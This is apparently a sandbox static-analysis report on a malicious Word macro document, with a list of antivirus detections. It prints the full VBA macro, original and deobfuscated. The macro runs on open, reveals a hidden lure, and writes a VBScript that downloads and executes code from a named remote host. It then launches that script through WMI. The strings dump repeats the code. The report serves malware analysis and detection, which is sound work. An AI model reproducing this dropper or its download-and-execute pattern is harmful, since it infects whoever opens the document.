popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ViewPage(nShape)
    On Error Resume Next
    Set doc = ActiveDocument
    Set sel = doc.Shapes(nShape)
    sel.Fill.Solid
    sel.Delete
    For ViewMode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = ViewMode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

Sub MainPage(resp)
    Documents.Add
    hs = "On Error Resume Next:Set mx = CreateObject(""Microsoft.XMLHTTP""):mx.open ""GET"", ""http://xxx/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"
    ui = "sendlucky.scienceontheweb.net/ben/chads"
    hs = Replace(hs, "xxx", ui)
    rp = resp & "\1589989024.xml"
    ActiveDocument.Range.Text = hs
    ActiveDocument.SaveAs2 FileName:=rp, FileFormat:=wdFormatText
    ActiveDocument.Close
    Set wmObj = GetObject("winmgmts:win32_process")
    wmObj.Create "wscript.exe //e:vbscript //b " & rp
End Sub

Sub AutoOpen()
    On Error Resume Next
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    wnd.Unprotect "1qaz2wsx"
    ViewPage ("pic")
    wnd.Save
    Set ob_tmp = Application.Templates
    Dim tmp As Template
    For Each tmp In ob_tmp
    If tmp.Type = 0 Then
        MainPage (tmp.Path)
        Exit For
    End If
    Next
End Sub

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ViewPage(nShape)
    On Error Resume Next
    Set doc = ActiveDocument
    Set sel = doc.Shapes(nShape)
    sel.Fill.Solid
    sel.Delete
    For ViewMode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = ViewMode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

Sub MainPage(resp)
    Documents.Add
    hs = "On Error Resume Next:Set mx = CreateObject(""Microsoft.XMLHTTP""):mx.open ""GET"", ""http://xxx/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"
    ui = "sendlucky.scienceontheweb.net/ben/chads"
    hs = Replace(hs, "xxx", ui)
    rp = resp & "\1589989024.xml"
    ActiveDocument.Range.Text = hs
    ActiveDocument.SaveAs2 FileName:=rp, FileFormat:=wdFormatText
    ActiveDocument.Close
    Set wmObj = GetObject("winmgmts:win32_process")
    wmObj.Create "wscript.exe //e:vbscript //b " & rp
End Sub

Sub AutoOpen()
    On Error Resume Next
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    wnd.Unprotect "1qaz2wsx"
    ViewPage ("pic")
    wnd.Save
    Set ob_tmp = Application.Templates
    Dim tmp As Template
    For Each tmp In ob_tmp
    If tmp.Type = 0 Then
        MainPage (tmp.Path)
        Exit For
    End If
    Next
End Sub
On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "http://xxx/list.php?query=1", False:mx.Send:Execute(mx.responseText)'
sendlucky.scienceontheweb.net/ben/chads
\1589989024.xml
winmgmts:win32_process$
wscript.exe //e:vbscript //b
1qaz2wsx
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Custom
ViewPage
(nShape)
rror ResA
S@et doc
Fill.Sol
Dele6t
10 To
0 Step -
.See>k
Wi0th S
.Whole Story
nt.Hidde
.Co0llap
En|d A
]Maina
]respD]
RsH.Ad
c:Abmx
Object("
"Microso
ft.XMLHT
TP""):mx
.op@0""GE
T"", ""h
ttp://xx
x/list.p
hp?query
Sen@d:Exec@
,onseT
lucky.sc ience
web.net/
ben/chad&s
ce8(hs
"\158998
9024.xml
.Rangef.
aveAs2
eAw:=rp,
Nmat:=wd
winmgmts
32_pro`cess"
6 "wscri
pt.exe /`/e:vb
"`rp
uApplica`tion.#!
yp!lwdPri
wnd.Un
t N "1qazp2wsxd2
![ `("picf
ob_tmA<
d7Dim
Win64x
Project-
stdole
Normal
Office
ThisDocument<
_Evaluate
ViewPage
nShape
ActiveDocument
Shapes
Delete
ViewModeHDP
ActiveWindow
SeekView$
SelectionZ
WholeStory
Hidden]
Collapse
MainPager1P
Documents
Replacef
SaveAs2
FileNamej
FileFormat
wdFormatText
wmObjZ
GetObjectz
Create
AutoOpen
Application
wdPrintView(
Unprotect
ob_tmp
Templates
Template
Documentj
_B_var_wnd
_B_var_ob_tmp
_B_var_doc
_B_var_selw
_B_var_ViewMode
_B_var_hs8
_B_var_ui
_B_var_rp
_B_var_wmObjGaP
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
Shared\
OFFICE16
\MSO.DLL
M 16.0
ThisDocu
*\CNormalrU
Project
ThisDocument
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Office16\MSWORD.OLB
stdole
C:\Windows\System32\stdole2.tlb
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
Document
ViewPage
MainPage
AutoOpen
VBE7.DLL
nShape
3Rb<_*
dThisDocument
ID="{00000000-0000-0000-0000-000000000000}"
Document=ThisDocument/&H00000000
HelpFile=""
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="F6F45A0DAA17531B531B56205620"
DPB="A3A10FE0A1FDA1FD5E03A2FDE0FBB11687914802A9749FBD31B7C638815AC90A857467B589"
GC="5052FCFFFDFFFDFF"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=26, 26, 1026, 511,
bWv~+6
Root Entry
ThisDocument
__SRP_2
(1Normal.ThisDocument
$*\Rffff*0762ea7d0c
*\R1*#c7
*\R1*#71
*\R1*#c6
*\R1*#c0
*\R1*#d0
*\R1*#158
*\R1*#17b
*\R1*#c1
*\R1*#129
*\R1*#e3
*\R1*#c5
*\R0*#f
*\R1*#d4
*\R1*#43
*\R0*#17
*\G{000204EF-0__SRP_3
_VBA_PROJECT
__SRP_0
000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
ThisDocument
0762ea7d0c
ThisDocument
1qaz2wsx
Unprotect
Shapes
Delete
\1589989024.xmlL
On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "http://xxx/list.php?query=1", False:mx.Send:Execute(mx.responseText)
sendlucky.scienceontheweb.net/ben/chads
wscript.exe //e:vbscript //b
winmgmts:win32_process
Create
__SRP_1
PROJECTwm
PROJECT
tThisDocument
Antivirus Signature
Bkav Clean
Lionic Trojan.MSWord.SAgent.4!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal O97M.Downloader.44590
ALYac Trojan.Downloader.DOC.Gen
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-Macro.Save.635ac491
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Office.VBA_Macro_Heur
Cyren PP97M/Agent.AHO.gen!Eldorado
Symantec Trojan.Gen.NPE
ESET-NOD32 VBA/TrojanDropper.Agent.BWY
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.MSOffice.SAgent.gen
BitDefender VB:Trojan.Valyria.5201
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan VB:Trojan.Valyria.5201
Tencent Heur.Macro.Generic.g.751d73a2
Sophos Clean
Baidu Clean
F-Secure Malware.VBS/Drop.Agent.udrmb
DrWeb Clean
VIPRE VB:Trojan.Valyria.5201
TrendMicro Clean
McAfee-GW-Edition BehavesLike.OLE2.Downloader.mr
FireEye VB:Trojan.Valyria.5201
Emsisoft VB:Trojan.Valyria.5201 (B)
SentinelOne Static AI - Malicious OLE
Jiangmin Clean
Avira VBS/Drop.Agent.udrmb
MAX malware (ai score=100)
Antiy-AVL Trojan/MSOffice.SAgent.gen
Microsoft Trojan:X97M/Kimsuky!ic
Gridinsoft Clean
Xcitium Clean
Arcabit HEUR.VBA.CG.2
ViRobot DOC.Z.Agent.22016.AYI
ZoneAlarm HEUR:Trojan.MSOffice.SAgent.gen
GData VB:Trojan.Valyria.5201
Google Clean
AhnLab-V3 Downloader/DOC.Generic.S1649
Acronis Clean
McAfee W97M/Downloader.dsn
TACHYON Suspicious/X97M.XSR.Gen
VBA32 Clean
Zoner Clean
Rising Trojan.CodeLoader/VBA!1.DFBF (CLASSIC)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet VBA/Agent.A955!tr
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.